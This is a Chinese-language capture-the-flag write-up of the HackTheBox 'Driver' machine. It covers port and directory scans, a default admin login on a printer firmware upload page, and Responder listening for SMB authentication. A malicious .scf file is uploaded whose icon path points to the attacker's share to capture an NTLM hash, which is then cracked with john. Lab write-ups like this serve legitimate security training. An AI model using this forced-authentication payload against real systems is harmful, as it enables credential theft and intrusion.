HackTheBox - Machines - Driver

kam1

发布于 2022-03-08 13:58:40

4830

发布于 2022-03-08 13:58:40

文章被收录于专栏：HackTheBox渗透学习记录HackTheBox渗透学习记录

Hack The Box - Machines - Driver

靶机：10.10.11.106 攻击机：10.10.14.28

1. 信息搜集

Nmap -sS -sC -sV -A 10.10.11.106  
  
Nmap scan report for 10.10.11.106  
Host is up (0.24s latency).  
Not shown: 997 filtered tcp ports (no-response)  
PORT    STATE SERVICE      VERSION  
80/tcp  open  http         Microsoft IIS httpd 10.0  
| http-auth:  
| HTTP/1.1 401 Unauthorized\\x0D  
|\_  Basic realm=MFP Firmware Update Center. Please enter password for admin  
| http-methods:  
|\_  Potentially risky methods: TRACE  
|\_http-title: Site doesn't have a title (text/html; charset=UTF-8).  
|\_http-server-header: Microsoft-IIS/10.0  
135/tcp open  msrpc        Microsoft Windows RPC  
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)  
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port  
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)  
No exact OS matches for host (test conditions non-ideal).  
Network Distance: 2 hops  
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows  
  
Host script results:  
| smb2-security-mode:  
|   3.1.1:  
|\_    Message signing enabled but not required  
| smb-security-mode:  
|   account\_used: guest  
|   authentication\_level: user  
|   challenge\_response: supported  
|\_  message\_signing: disabled (dangerous, but default)  
| smb2-time:  
|   date: 2022-03-04T18:18:39  
|\_  start\_date: 2022-03-04T18:16:38  
|\_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m57s  
  
TRACEROUTE (using port 80/tcp)  
HOP RTT       ADDRESS  
1   241.00 ms 10.10.14.1  
2   241.00 ms 10.10.11.106  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

python dirsearch.py \--random\-agent \--exclude\-status 400,401,403,404,500,503 \-e \* \-u http://10.10.11.106  
  
 \_|. \_ \_  \_  \_  \_ \_|\_    v0.4.2  
 (\_||| \_) (/\_(\_|| (\_| )  
  
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30  
Wordlist size: 15492  
  
Output File: E:\\信息搜集\\目录扫描\\dirsearch\-master\\reports\\10.10.11.106\\\_22\-03\-04\_19\-23\-56.txt  
  
Error Log: E:\\信息搜集\\目录扫描\\dirsearch\-master\\logs\\errors\-22\-03\-04\_19\-23\-56.log  
  
Target: http://10.10.11.106/  
  
\[19:23:57\] Starting:  
\[19:25:26\] 301 \-  150B  \- /images  \->  http://10.10.11.106/images/  
  
Task Completed

端口扫描出来的结果得知靶机开放端口：80,135,445

访问web页面，提示输入账号密码直接admin admin就进入了。

目录扫描没有结果，但是从页面给出的信息来看，可以得知这是一个打印机

其中FirmWare Updates 可以跳转到fw_up.php页面，而其他都指向页面本身

来到fw_up.php 映入眼帘的是一个文件上传

2. 漏洞利用

文件上传走一波，先上传个php试试水，上传成功，但是这里没有回显出上传之后的路径

经过一番的查找之后还是没能找到php文件的位置所在，没办法只好想想其他的办法。

讲这句话翻译了一下：选择打印机型号并将相应的固件更新上传到我们的文件共享中。我们的测试团队将手动检查上传的内容，并很快启动测试。

本以为会后台自动访问我上传的文件，我上传了一个访问我临时python起的http服务，但是等了半天也没反应。

思来想去没结果，google了一下MFP Firmware Update Center exploit

实际上这里是和smb结合起来使用的，首先先使用Responder本地监听起来

python2 Responder.py --lm -v -I tun0 这里-I后面跟的是网卡的名字

然后再上传一个xxx.scf文件，内容为

[Shell]  
Command=2  
IconFile=\\10.10.14.28\share\pentestlab.ico  
# 其中的ip写监听者的ip，也就是攻击机的ip  
[Taskbar]  
Command=ToggleDesktop

接下来就是等待后台在共享目录中访问该文件

当点击提交后，这边responder就会输出smb用户名和ip还有ntml hash值。

得到ntml hash值之后，用john破解一下该值，需要将该NTML HASH值放入一个txt文件中。

得到 tony的密码 liltony

此时再次使用nmap进行端口扫描

Nmap -sS -T4 -p- -sC -sV 10.10.11.106  
  
Nmap scan report for 10.10.11.106  
Host is up (0.30s latency).  
Not shown: 65531 filtered tcp ports (no-response)  
PORT     STATE SERVICE      VERSION  
80/tcp   open  http         Microsoft IIS httpd 10.0  
|\_http-title: Site doesn't have a title (text/html; charset=UTF-8).  
| http-methods:   
|\_  Potentially risky methods: TRACE  
| http-auth:   
| HTTP/1.1 401 Unauthorized\\x0D  
|\_  Basic realm=MFP Firmware Update Center. Please enter password for admin  
|\_http-server-header: Microsoft-IIS/10.0  
135/tcp  open  msrpc        Microsoft Windows RPC  
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)  
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)  
|\_http-title: Not Found  
|\_http-server-header: Microsoft-HTTPAPI/2.0  
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows  
  
Host script results:  
| smb2-security-mode:   
|   3.1.1:   
|\_    Message signing enabled but not required  
| smb-security-mode:   
|   authentication\_level: user  
|   challenge\_response: supported  
|\_  message\_signing: disabled (dangerous, but default)  
| smb2-time:   
|   date: 2022-03-04T20:15:13  
|\_  start\_date: 2022-03-04T18:16:38  
|\_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s